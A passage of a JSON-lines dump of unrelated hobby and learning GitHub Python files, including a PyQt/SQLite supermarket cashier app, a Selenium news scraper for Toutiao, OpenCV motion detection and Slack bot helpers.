Ölüm Zaman Grafiği\r\nseries = read_csv('corona-virus-istatistikleri-resampled.csv', header=0, usecols=[3])\r\nseries.plot(style='k.')\r\npyplot.show()\r\n\r\n\r\n#Günlük Vaka / Test Oran Dağılım Grafiği\r\nseries = read_csv('corona-virus-istatistikleri-resampled.csv', header=0, usecols=[9])\r\nseries.plot(kind='kde')\r\npyplot.show()\r\n\r\n\r\n#Günlere Göre Test Miktarı\r\nseries = Series.from_csv('corona-virus-istatistikleri-resampled.csv', header=0)\r\none_year = series['2020']\r\ngroups = one_year.groupby(TimeGrouper('D'))\r\ndays = concat([DataFrame(x[1].values) for x in groups], axis=1)\r\ndays = DataFrame(days)\r\ndays.columns = range(1,22)\r\ndays.boxplot()\r\npyplot.show()\r\n\r\n\r\n\r\n","repo_name":"bilishim/covid19","sub_path":"corona-line-plot.py","file_name":"corona-line-plot.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22721877828","text":"from itertools import combinations as comb\n\n\ndef main():\n a, b, c = map(int, input().split())\n li = comb([a, b, c], 2)\n Count = 0\n for l in li:\n if l[0] == l[1]:\n Count += 1\n\n if Count == 1:\n print(\"Yes\")\n else:\n print(\"No\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Msksgm/atcoder_msksgm_practice","sub_path":"abc/155/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39492951897","text":"\"\"\"Memberships serializers.\"\"\"\r\n\r\n# REST Framwork\r\nfrom rest_framework import serializers\r\n\r\n# Serializers\r\nfrom bookshare.users.serializers import UserModelSerializer\r\n\r\n# Models\r\nfrom bookshare.circles.models import Membership, Invitation\r\n\r\n# Utils\r\nfrom django.utils import timezone\r\n\r\nclass MembershipModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Membership model serializer.\"\"\"\r\n\r\n user = UserModelSerializer(read_only=True)\r\n joined_at = serializers.DateTimeField(source='created', read_only=True)\r\n invited_by = serializers.StringRelatedField()\r\n\r\n class Meta:\r\n model = Membership\r\n fields = [\r\n 'user',\r\n 'remaning_invitations',\r\n 'invited_by',\r\n 'is_admin',\r\n 'lends_offered',\r\n 'lends_taked',\r\n 'joined_at'\r\n ]\r\n\r\n\r\nclass AddMemberSerializer(serializers.Serializer):\r\n \"\"\"\"\"\"\r\n user = serializers.HiddenField(default=serializers.CurrentUserDefault())\r\n code = serializers.CharField()\r\n remaning_invitations = serializers.IntegerField()\r\n\r\n def validate_user(self, data):\r\n \"\"\"Verify is user is already in the circle.\"\"\"\r\n\r\n self.circle = self.context.get('circle')\r\n\r\n query = Membership.objects.filter(\r\n circle=self.circle,\r\n user=data\r\n )\r\n if query.exists():\r\n raise serializer.ValidationError('User is already a member.')\r\n\r\n return data\r\n\r\n def validate_code(self, data):\r\n \"\"\"Verify is the code is valid.\"\"\"\r\n\r\n try:\r\n query = Invitation.objects.get(\r\n code=data,\r\n circle=self.circle,\r\n used=False\r\n )\r\n except Invitation.DoesNotExist:\r\n raise serializer.ValidationError('Invalid code.')\r\n\r\n self.invitation = query\r\n\r\n return data\r\n\r\n def validate(self, data):\r\n \"\"\"Validate if a new member can be added.\"\"\"\r\n\r\n if self.circle.members_limit != 0:\r\n counter = self.circle.members.count()\r\n diff = self.circle.members_limit - counter\r\n if diff <= 0:\r\n raise serializers.ValidationError('Circles has reached his members limit')\r\n\r\n return data\r\n\r\n\r\n def create(self, validated_data):\r\n\r\n\r\n member = Membership.objects.create(\r\n circle=self.circle,\r\n invited_by=self.invitation.issued_by,\r\n user=validated_data['user'],\r\n is_admin=False,\r\n is_active=True,\r\n remaning_invitations=validated_data['remaning_invitations']\r\n )\r\n\r\n # Updates\r\n\r\n # Invitation\r\n self.invitation.used_by = validated_data['user']\r\n self.invitation.used = True\r\n self.invitation.used_at = timezone.now()\r\n self.invitation.save()\r\n\r\n # Issuer\r\n issuer = Membership.objects.get(\r\n user=self.invitation.issued_by,\r\n circle=self.circle\r\n )\r\n issuer.remaning_invitations -= 1\r\n issuer.save()\r\n\r\n return member\r\n","repo_name":"ezecavallo/bookshare","sub_path":"bookshare/circles/serializers/memberships.py","file_name":"memberships.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70259513530","text":"phone_num_dic = {\n 'Marketing' : {\n 'Robert': '111-111-1111',\n 'Shawn' : '222-222-2222',\n 'Bryce': '333-333-3333'\n },\n 'It' : {\n 'Lisa': '444-444-4444',\n 'Jason':'555-555-5555'\n }\n}\n\n# Get All departments in phone_num_dic\ndepartment = []\nfor dep , emp in phone_num_dic.items():\n print(dep)\n department.append(dep)\n\nprint(f\"All department is dictionary is {department}\")\n# All department is dictionary is ['Marketing', 'It']\n\n\n# Get All employee in phone_num_dic\nemployee = []\nfor dep, emp in phone_num_dic.items():\n #print(emp.items())\n for name, phone in emp.items():\n employee.append(name)\nprint(f\"All Employee is dictionary is {employee}\")\n#All Employee is dictionary is ['Robert', 'Shawn', 'Bryce', 'Lisa', 'Jason']\n\n''' Using a list comprehension, get all employee's Name '''\nemployees = [list(emp.keys()) for dep, emp in phone_num_dic.items()]\n\nprint(employees) #[['Robert', 'Shawn', 'Bryce'], ['Lisa', 'Jason']]\n\n''' for employee in employees:\n for e in employee:\n print(e) '''\n# Flatten to remove list of lists and convert to a single list\nemployee = [employee for employee in employees for employee in employee] \nprint(employee) \n\n\n'''Using a list comprehension & intertools chain, get all phone number '''\nfrom itertools import chain\nphonenumbers = [list(emp.values()) for dep, emp in phone_num_dic.items()]\nprint(phonenumbers) # [['111-111-1111', '222-222-2222', '333-333-3333'], ['444-444-4444', '555-555-5555']]\n\nphoneNumbers =list(chain.from_iterable([list(emp.values()) for dep, emp in phone_num_dic.items()]))\nprint(phoneNumbers) #['111-111-1111', '222-222-2222', '333-333-3333', '444-444-4444', '555-555-5555']\n\n ","repo_name":"Zioq/Algorithms-and-Data-Structures-With-Python","sub_path":"5.Iterations/nestedDic.py","file_name":"nestedDic.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14616574274","text":"from selenium.common.exceptions import NoSuchElementException\n\nclass KybTest(object):\n def __init__(self,driver):\n self.driver=driver\n\n def check_cancelBtn(self):\n print('check cancelBtn')\n\n try:\n cancelBtn = self.driver.find_element_by_id('android:id/button2')\n except NoSuchElementException:\n print('no cancelBtn')\n else:\n cancelBtn.click()\n\n def check_skipBtn(self):\n print('check skipBtn')\n\n try:\n skipBtn = self.driver.find_element_by_id('com.tal.kaoyan:id/tv_skip')\n except NoSuchElementException:\n print('no skipBtn')\n else:\n skipBtn.click()\n\n def skip_update_guide(self):\n self.check_cancelBtn()\n self.check_skipBtn()","repo_name":"LIShuLin0312/appium_sync","sub_path":"kyb_test.py","file_name":"kyb_test.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"42098569220","text":"vechicles = {\r\n 'dream': 'honda 250',\r\n 'roadster': 'bmw r1100',\r\n \"er5\": \"kawasaki er5\",\r\n \"virago\": \"yamaha xt750\"\r\n}\r\nmy_car = vechicles[\"dream\"]\r\nprint(my_car)\r\nmy = vechicles[\"virago\"] # INDEXING RETURNS KEY ERROR WHEN KEY IS WRONG (INDEXING IS FASTER THAN GET)\r\n# BUT USE ONLY U KNOW KEY\r\nprint(my)\r\nnew = vechicles.get(\"ER5\") # .GET RETURNS NONE WHEN KEY IS WRONG (USE WHEN U NOT SURE IN KEY IS CORRECT OR NOT)\r\nprint(new)\r\nprint()\r\nprint()\r\n\r\n# Adding items\r\nvechicles[\"star\"] = \"lockracer\"\r\nvechicles[\"toy\"] = \"glider\"\r\nfor key in vechicles:\r\n print(key, vechicles[key], sep=\" : \")\r\nprint(\"!1111111111111111111111111111\")\r\nvechicles[\"virago\"] = \"new yamaha\"\r\nfor key, val in vechicles.items(): # MORE EFFICIENT\r\n print(key, val, sep=\" : \")\r\ndel vechicles[\"virago\"]\r\n# del vechicles[\"f1\"] ithu error key not present\r\nresult = vechicles.pop(\"f1\",\r\n \"##########################podu illa\") # default aa error the varu pop la um ,ku apro namma pop\r\n# kita sollula enna return aganu nu\r\nprint(result)\r\nprint(\"2222222222222222222222222222222222\")\r\nfor key, val in vechicles.items(): # MORE EFFICIENT\r\n print(key, val, sep=\" : \")\r\n\r\nval = vechicles.pop(\"dream\")\r\nprint(\"ithu present : \", val)\r\nval = vechicles.pop(\"roadster\", \"not present\") # its is true actually\r\nprint(val)\r\n","repo_name":"logeshnatarajan/basic_python","sub_path":"dictionary_and_set/dict_intro.py","file_name":"dict_intro.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"71732522490","text":"from interface import *\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtGui import QClipboard\r\nfrom PyQt5.QtWidgets import QApplication, QMessageBox\r\nimport sys\r\nimport sqlite3\r\nfrom PyQt5.QtGui import *\r\nfrom datetime import datetime\r\n\r\n\r\ndef main(ui):\r\n try:\r\n # Criando Banco de dados e Tabelas\r\n banco = sqlite3.connect('banco_dados.db')\r\n cursor = banco.cursor()\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS produtos (\r\n id integer PRIMARY KEY AUTOINCREMENT,\r\n codigo integer,\r\n produto text,\r\n preco REAL)\"\"\")\r\n banco.commit()\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS notas (\r\n id integer PRIMARY KEY AUTOINCREMENT,\r\n caixa integer,\r\n nota text,\r\n valor real,\r\n data text)\"\"\")\r\n banco.commit()\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS gestao (\r\n id integer PRIMARY KEY AUTOINCREMENT,\r\n caixa integer,\r\n codigo integer,\r\n quantidade integer,\r\n data text)\"\"\")\r\n banco.commit()\r\n banco.close()\r\n except sqlite3.Error as erro:\r\n print(f'Erro de nome: {erro}')\r\n\r\n def data_agora():\r\n data = str(datetime.today())\r\n data = str(data[:-7])\r\n data.replace(' ','-')\r\n return data\r\n\r\n def mostrar_msg(titulo, texto):\r\n titulo = str(titulo)\r\n texto = str(texto)\r\n win = MainWindow\r\n msg = QMessageBox(win)\r\n msg.setWindowTitle(f\"{titulo}\")\r\n msg.setText(f\"{texto}\")\r\n x = msg.exec_()\r\n\r\n def definir_metodo_pagamento():\r\n if ui.rd_cartao.isChecked() == False and ui.rd_dinheiro.isChecked() == False:\r\n retorno = 'nao selecionado'\r\n elif ui.rd_dinheiro.isChecked():\r\n retorno = 'DINHEIRO'\r\n else:\r\n retorno = 'CARTAO'\r\n return retorno\r\n\r\n def enviar_banco_notas():\r\n caixa = ui.lb_caixa.text()\r\n nota = ui.txt_nota.toPlainText()\r\n valor = ui.txt_preco.text()\r\n banco = sqlite3.connect('banco_dados.db')\r\n data = str(data_agora())\r\n cursor = banco.cursor()\r\n # cursor.execute(f\"INSERT INTO notas values (NULL,'{caixa}','{nota}','{valor},'{data}')\")\r\n cursor.execute(f\"INSERT INTO notas values (NULL,'{caixa}','{nota}','{valor}','{data}')\")\r\n banco.commit()\r\n\r\n def enviar_banco_gestao():\r\n global lista_compra\r\n caixa = ui.lb_caixa.text()\r\n banco = sqlite3.connect('banco_dados.db')\r\n data = str(data_agora())\r\n cursor = banco.cursor()\r\n for x in range(0,len(lista_compra)//2):\r\n print(lista_compra)\r\n print(x)\r\n codigo = lista_compra[x]\r\n quantidade = lista_compra[x+1]\r\n cursor.execute(f\"INSERT INTO gestao values (NULL,'{caixa}','{codigo}','{quantidade}','{data}')\")\r\n banco.commit()\r\n banco.close()\r\n lista_compra.clear()\r\n\r\n def definir_troco():\r\n total_compra = float(ui.txt_preco.text())\r\n dinheiro_recebido = float(ui.txt_dinheiro_recebido.text())\r\n troco = dinheiro_recebido - total_compra\r\n ui.txt_troco.setText(f'{troco:.2f}')\r\n\r\n def definir_preco_total(preco,quantidade,opcao=0):\r\n if opcao == 1:\r\n pass\r\n else:\r\n preco = float(preco)\r\n quantidade = int(quantidade)\r\n valor_adicionar = preco * quantidade\r\n valor_atual = ui.txt_preco.text()\r\n if len(valor_atual) == 0:\r\n valor_atual = 0\r\n else:\r\n valor_atual = float(valor_atual)\r\n calculo = valor_atual+valor_adicionar\r\n ui.txt_preco.setText(f'{calculo:.2f}')\r\n\r\n def procurar():\r\n global codigo,produto,preco\r\n try:\r\n pesquisar = str(ui.txt_codigo.text()).strip()\r\n if len(pesquisar) != 0:\r\n if len(str(pesquisar)) < 6:\r\n pesquisar = ('0' * (6 - len(str(pesquisar)))) + str(pesquisar)\r\n\r\n banco = sqlite3.connect('banco_dados.db')\r\n cursor = banco.cursor()\r\n cursor.execute(f\"\"\"SELECT codigo,produto,preco from produtos WHERE codigo == '{pesquisar}'\"\"\")\r\n produtos = cursor.fetchall()\r\n if len(produtos) != 0:\r\n produtos = produtos[0]\r\n banco.commit()\r\n codigo = produtos[0]\r\n produto = produtos[1]\r\n preco = produtos[2]\r\n ui.txt_codigo_produto.setText(f'{codigo}')\r\n ui.txt_produto.setText(f'{produto}')\r\n ui.txt_preco_unitario.setText(f'{preco}')\r\n banco.close()\r\n else:\r\n mostrar_msg('Caixa EMPRESA XYZ','Digite o codigo do produto')\r\n else:\r\n mostrar_msg('Caixa EMPRESA XYZ','Digite o codigo do produto')\r\n except ValueError as erro:\r\n mostrar_msg('Caixa EMPRESA XYZ',f'Erro nome: {erro}')\r\n ui.txt_troco.setText('')\r\n\r\n def adicionar_linha_nota(codigo_produto,produto,quantidade,preco):\r\n ui.txt_nota.append(f'{codigo_produto:0<6} {\"\":-<4} {produto: <10} {\"\":-<4} {quantidade:0>3} {\"-\" * 4} {preco: >5}')\r\n\r\n def adicionar_nota():\r\n #\r\n # VERSÃO 00\r\n # if len(pesquisar) != 0:\r\n # for x in range(1, (len(produtos) // 4) + 1):\r\n # if len(str(x)) < 6:\r\n # pesquisar = ('0' * (6 - len(str(x)))) + str(x)\r\n # codigo_indice = produtos.index(f'{pesquisar}')\r\n # codigo = produtos[codigo_indice]\r\n # produto = produtos[codigo_indice + 1]\r\n # quantidade = produtos[codigo_indice + 2]\r\n # preco = produtos[codigo_indice + 3]\r\n # adicionar_linha_nota(codigo,produto,quantidade,preco)\r\n global codigo, produto, preco, lista_nota, lista_compra\r\n quantidade = str(ui.txt_quantidade.text()).strip()\r\n try:\r\n print(lista_compra)\r\n except:\r\n lista_compra = []\r\n if len(ui.txt_codigo_produto.text()) != 0:\r\n try:\r\n lista_compra.append(f'{codigo}')\r\n lista_compra.append(f'{quantidade}')\r\n print(lista_compra)\r\n adicionar_linha_nota(codigo,produto,quantidade,preco)\r\n definir_preco_total(preco,quantidade)\r\n except ValueError as erro:\r\n mostrar_msg('Caixa EMPRESA XYZ',f'Erro nome: {erro}')\r\n else:\r\n mostrar_msg('Caixa EMPRESA XYZ','Digite um produto antes de inserir')\r\n\r\n def limpar_campos():\r\n ui.txt_preco.clear()\r\n ui.txt_codigo_produto.clear()\r\n ui.txt_produto.clear()\r\n ui.txt_preco_unitario.clear()\r\n ui.txt_quantidade.clear()\r\n ui.txt_codigo.clear()\r\n ui.txt_remover_produto.clear()\r\n ui.txt_dinheiro_recebido.clear()\r\n ui.txt_nota.clear()\r\n\r\n def enviar_dados():\r\n if ui.rd_dinheiro.isChecked():\r\n definir_troco()\r\n dinheiro_recebido = float(ui.txt_dinheiro_recebido.text())\r\n troco = float(ui.txt_troco.text())\r\n else:\r\n dinheiro_recebido = 0\r\n troco = 0\r\n valor_total = float(ui.txt_preco.text())\r\n nota = ui.txt_nota.toPlainText()\r\n ui.txt_nota.clear()\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('/' * 54)\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('CODIGO ---- NOME PRODU ---- QTD ---- PRECO')\r\n ui.txt_nota.append(nota)\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('-'*54)\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append(f'Total: {valor_total:<5.2f} ---- Dinheiro: {dinheiro_recebido:<5.2f} ')\r\n ui.txt_nota.append(f'Metodo de Pagamento: {definir_metodo_pagamento()}')\r\n ui.txt_nota.append(f'Troco: {troco:<5.2f}')\r\n ui.txt_nota.append(f'Data e hora: {data_agora()}')\r\n ui.txt_nota.append('')\r\n ui.txt_nota.append('/'*54)\r\n\r\n\r\n\r\n def verificar_campos():\r\n botao_cartao = ui.rd_cartao.isChecked()\r\n botao_dinheiro = ui.rd_dinheiro.isChecked()\r\n valor_retorno = 1\r\n if len(ui.txt_nota.toPlainText()) == 0:\r\n mostrar_msg('CAIXA EMPRESA XYZ','Entre ao Menos Um Item')\r\n valor_retorno = 0\r\n if botao_cartao == False and botao_dinheiro == False:\r\n mostrar_msg('CAIXA EMPRESA XYZ','Selecione o Tipo de Pagamento')\r\n valor_retorno = 0\r\n elif ui.rd_dinheiro.isChecked() == True and len(ui.txt_dinheiro_recebido.text()) == 0:\r\n mostrar_msg('CAIXA EMPRESA XYZ','Digite o Valor Recebido')\r\n valor_retorno = 0\r\n if len(ui.txt_dinheiro_recebido.text()) != 0 and len(ui.txt_preco.text()) != 0:\r\n recebido = float(ui.txt_dinheiro_recebido.text())\r\n total = float(ui.txt_preco.text())\r\n troco = recebido - total\r\n if troco < 0:\r\n mostrar_msg('CAIXA EMPRESA XYZ', 'O valor Recebido Não pode ser menor que o Valor total')\r\n valor_retorno = 0\r\n return valor_retorno\r\n\r\n\r\n\r\n def finalizar_compra():\r\n verificar = verificar_campos()\r\n if verificar == 1:\r\n # print('a')\r\n enviar_dados()\r\n enviar_banco_notas()\r\n enviar_banco_gestao()\r\n limpar_campos()\r\n\r\n lista_compra = ['1']\r\n ui.lb_caixa.setText('01')\r\n ui.btn_adicionar_produto.clicked.connect(adicionar_nota)\r\n ui.btn_procurar.clicked.connect(procurar)\r\n ui.btn_finalizar_compra.clicked.connect(finalizar_compra)\r\n ui.rd_cartao.clicked.connect(lambda: ui.txt_dinheiro_recebido.setText(''))\r\n\r\n# Mascaras de campos de texto\r\n\r\n # ui.txt_codigo.setValidator(QDoubleValidator(0, 0, 3))\r\n ui.txt_codigo.setInputMask(\"0000\")\r\n ui.txt_quantidade.setInputMask(\"000\")\r\n\r\n# Mascaras de campos de texto\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n MainWindow.show()\r\n main(ui)\r\n sys.exit(app.exec_())","repo_name":"kilerhg/Python-Studies","sub_path":"SQLite/Projetos/Caixa_Supermercado/janela.py","file_name":"janela.py","file_ext":"py","file_size_in_byte":10402,"program_lang":"python","lang":"pt","doc_type":"code","stars":64,"dataset":"github-code","pt":"77"} +{"seq_id":"15497710667","text":"import requests\nfrom urllib.parse import urlencode, unquote, urljoin\nfrom fake_useragent import UserAgent\nimport parsel\nimport csv\nimport logging\nfrom queue import Queue\nfrom threading import Thread\nfrom concurrent.futures import ThreadPoolExecutor\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s: %(message)s')\n\n\nclass TouTiao:\n def __init__(self, keyword, filename='头条新闻.csv'):\n self.fileObj = open(filename, 'w', encoding='utf8')\n self.writer = csv.writer(self.fileObj)\n self.params = {\n 'dvpf': 'pc',\n 'page_num': '0',\n 'keyword': keyword,\n 'pd': 'information',\n 'source': 'input',\n }\n self.search_url = 'https://so.toutiao.com/search'\n self.base_url = 'https://so.toutiao.com/'\n self.browser = self.get_broswer()\n self.detail_urls = []\n self.page_urls = []\n\n @staticmethod\n def get_proxy():\n return requests.get(\"http://127.0.0.1:5010/get/\").json()\n\n def get_broswer(self) -> webdriver:\n options = webdriver.ChromeOptions()\n # 处理证书错误\n options.add_argument('--ignore-certificate-errors')\n # 修改windows.navigator.webdriver,防机器人识别机制,selenium自动登陆判别机制\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\n options.add_argument(\"--disable-blink-features=AutomationControlled\")\n # 添加代理\n # proxy = TouTiao.get_proxy().get(\"proxy\")\n # options.add_argument('--proxy-server=http://' + proxy)\n browser = webdriver.Chrome(options=options)\n return browser\n\n def request_start_page_url(self):\n useragent = UserAgent().random\n headers = {\n 'User-Agent': useragent,\n 'Referer': 'https://so.toutiao.com/',\n }\n r = requests.get(self.search_url, params=self.params, headers=headers)\n html = r.text\n self.parse_links(html, self.search_url, useragent, r.cookies)\n\n def request_page_url(self):\n print(f\"此时page_urls的大小为:{len(self.page_urls)}\")\n while len(self.page_urls) != 0:\n page_url, referer = self.page_urls.pop()\n useragent = UserAgent().random\n headers = {\n 'User-Agent': useragent,\n 'Referer': referer,\n }\n logging.info(f'正在请求: {page_url}')\n r = requests.get(page_url, headers=headers)\n self.parse_links(r.text, page_url, useragent, r.cookies)\n\n\n def parse_links(self, html, referer, useragent, cookies):\n sel = parsel.Selector(html)\n hrefs = sel.css('.text-xl>a::attr(href)').re(r'url=(.*)') # 注意该url已被加密\n print(\"文章链接: \", [unquote(href) for href in hrefs])\n\n for href in hrefs:\n item = (unquote(href), referer, useragent, cookies)\n logging.info('添加detail_urls中: (%s, %s, %s, %s)' % item)\n self.detail_urls.append(item)\n\n # 获取下一页的url,次url从/search开始\n next_page = sel.xpath('//a[contains(.,\"下一页\")]/@href').get()\n # 下一页的链接\n print('下一页的链接', next_page)\n if next_page:\n item2 = (urljoin(self.base_url, next_page), referer)\n logging.info('添加page_urls中: (%s, %s)' % item2)\n self.page_urls.append(item2)\n\n def request_article_url(self):\n print(f\"此时detail_urls的大小为:{len(self.detail_urls)}\")\n while len(self.detail_urls) != 0:\n detail_url, referer, useragent, cookies = self.detail_urls.pop()\n # headers['Referer'] = referer\n # headers['User-Agent'] = useragent\n # logging.info(f'请求文章{detail_url}')\n # r = requests.get(detail_url, headers=headers, cookies=cookies)\n # parse_article(r.text)\n\n # 利用selenium抓取\n logging.info(f'请求文章{detail_url}')\n self.browser.get(detail_url)\n wait = WebDriverWait(self.browser, 5)\n try:\n wait.until(EC.presence_of_element_located((By.XPATH, '//article')))\n html = self.browser.page_source\n # if 'error' in html:\n # self.put_back(detail_url, referer, useragent, cookies)\n # continue\n item = (detail_url, referer, useragent, cookies)\n self.parse_article(html, item)\n except TimeoutException as e:\n logging.error(e)\n self.put_back(detail_url, referer, useragent, cookies)\n\n\n def parse_article(self, html, item):\n sel = parsel.Selector(html)\n title = sel.css('h1::text').get()\n article = sel.xpath('//article//text()').extract()\n if not title or not article:\n return self.put_back(*item)\n article = ''.join(article)\n\n row = [title, article]\n print(f'保存当清数据{row}')\n self.writer.writerow(row)\n\n def put_back(self, detail_url, referer, useragent, cookies):\n self.browser.close()\n self.browser = self.get_broswer()\n # 放回原队列\n self.detail_urls.insert(0, (detail_url, referer, useragent, cookies))\n\n def start(self):\n self.request_start_page_url()\n # while len(self.page_urls) != 0:\n # self.request_page_url()\n # while len(self.detail_urls) != 0:\n # self.request_article_url()\n self.request_article_url()\n\n\n def __del__(self):\n self.fileObj.close()\n self.browser.close()\n\n\nif __name__ == '__main__':\n toutiao = TouTiao('208万日薪')\n toutiao.start()\n","repo_name":"Bruceey/PythonSpider","sub_path":"touTiao/toutiao_final.py","file_name":"toutiao_final.py","file_ext":"py","file_size_in_byte":6000,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"313392415","text":"import cv2, time, pandas\nfrom datetime import datetime\n\n# web cam\nvideo = cv2.VideoCapture(0)\nvideo.read()\ntime.sleep(1.0)\n\n# first frame\nfirst_frame = None\ncount = 0\nstatus_list = [0,0]\ntimes = []\ndf = pandas.DataFrame(columns=[\"Start\",\"End\"])\n\nwhile True:\n check, frame = video.read()\n status = 0\n\n gray_frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n gray_frame = cv2.GaussianBlur(gray_frame,(21,21),0)\n\n ###\n ########## detect motion\n ###\n\n # get first frame\n if first_frame is None:\n first_frame = gray_frame\n continue\n\n # difference of frame\n diff_frame = cv2.absdiff(first_frame,gray_frame)\n thresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1]\n thresh_frame = cv2.dilate(thresh_frame, None, iterations=2)\n\n # find contours\n (cnts,_) = cv2.findContours(thresh_frame.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n for contour in cnts:\n if cv2.contourArea(contour) < 50000 :\n continue\n status = 1\n (x,y,w,h) = cv2.boundingRect(contour)\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),6)\n\n status_list = status_list[-2:]\n status_list.append(status)\n if status_list[-1] == 1 and status_list[-2] == 0:\n times.append(datetime.now())\n if status_list[-1] == 0 and status_list[-2] == 1:\n times.append(datetime.now())\n\n cv2.imshow(\"Capturing\",gray_frame)\n cv2.imshow(\"Delta\",diff_frame)\n cv2.imshow(\"THRES\",thresh_frame)\n cv2.imshow(\"Countour\",frame)\n\n key = cv2.waitKey(1)\n\n if key == ord('q'):\n if status == 1:\n times.append(datetime.now())\n break\n \n\nfor i in range(0,len(times),2):\n df = df.append({\"Start\":times[i],\n \"End\":times[i+1]},ignore_index=True)\n\ndf.to_csv(\"Times.csv\")\nvideo.release()\ncv2.destroyAllWindows()","repo_name":"achhetr/Front-face-detection","sub_path":"motion_detection.py","file_name":"motion_detection.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32349500874","text":"\ndef remove_duplicates(arg):\n arga=arg\n arga.sort()\n list_sorted=[arga[0]]\n for i in arga:\n if list_sorted[-1]!=i:\n list_sorted.append(i)\n return list_sorted\n\n\ndef remove_duplicates2(arg):\n arga=arg\n list_sorted=[]\n for i in arg:\n if i not in list_sorted:\n list_sorted.append(i)\n return list_sorted\n\ndef remove_duplicates3(arg):\n return list(set(arg))\n\nif __name__ == '__main__':\n import timeit\n\n a=[4,5,6,2,3,1,2,7,8,2]*1000\n print(\"My def: \",timeit.timeit(\"remove_duplicates(a)\", setup=\"from __main__ import remove_duplicates,a\"))\n print(\"if not in: \",timeit.timeit(\"remove_duplicates2(a)\", setup=\"from __main__ import remove_duplicates2,a\"))\n print(\"Set: \",timeit.timeit(\"remove_duplicates3(a)\", setup=\"from __main__ import remove_duplicates3,a\"))\n","repo_name":"dzaczek/learning_py","sub_path":"duplicator.py","file_name":"duplicator.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42711986171","text":"from typing import Dict, List\n\nfrom slack.methods import Methods\nfrom functools import lru_cache\nfrom flask import url_for, current_app\nimport requests\nfrom werkzeug.local import LocalProxy\n\nfrom pyback import slack_client as slack\n\nAPP_TOKEN = LocalProxy(lambda: current_app.config['APP_TOKEN'])\nlogger = LocalProxy(lambda: current_app.logger)\n\n\nclass Message:\n def __init__(self, ts, channel, text):\n self.ts = ts\n self.channel = channel\n self.text = text\n\n @property\n def channel_name(self) -> str:\n return Message.get_channel_name(self.channel)\n\n @property\n def delete_url(self) -> str:\n return url_for('web.delete_message', ts=self.ts, channel=self.channel)\n\n @classmethod\n @lru_cache(64)\n def get_channel_name(cls, channel: str) -> str:\n response = slack.api_call(Methods.CONVERSATIONS_INFO, channel=channel)\n if response['ok']:\n channel = response['channel']\n if 'name' in channel:\n return response['channel']['name']\n elif channel['is_im']:\n return slack.user_name_from_id(channel['user'])\n else:\n return channel\n else:\n return channel\n\n def serialize(self) -> Dict[str, str]:\n return {\n 'ts': self.ts,\n 'channel': self.channel,\n 'text': self.text,\n 'delete_url': self.delete_url,\n }\n\n\ndef get_messages() -> List[Dict[str, str]]:\n bot_name = slack.bot_name\n\n data = {\n 'token': str(APP_TOKEN),\n 'query': f'from:{bot_name}',\n 'count': 100,\n 'sort': 'timestamp'\n }\n json_response = _call_slack_api(data)\n matches = json_response['messages']['matches']\n messages = [Message(match['ts'], match['channel']['id'], match['text']).serialize() for match in matches]\n return messages\n\n\ndef _call_slack_api(data):\n res = requests.post('https://slack.com/api/search.messages', data=data)\n logger.debug(f'API call method: search.messages || Result: {res.status_code}')\n res.raise_for_status()\n\n return res.json()\n\n\ndef delete(ts: str, channel: str):\n return slack.delete_message(ts, channel)\n","repo_name":"AllenAnthes/pyback-rewrite","sub_path":"pyback/web/bot_message_handlers.py","file_name":"bot_message_handlers.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74224144569","text":"from os import environ\nfrom pprint import pprint\n\nfrom flask import Flask\n\nclass BaseConfig:\n REDIS_HOST = \"redis.ephemeral-development\"\n FLASK_ENV=\"development\"\n\nclass Local:\n REDIS_HOST = \"redis\"\n\nclass ECS:\n pass\n\ndef get_configuration(docker):\n \"\"\"Helper function to retrieve configuration based on environment cross product.\"\"\"\n dockerenvs = dict(local=Local, ecs=ECS)\n 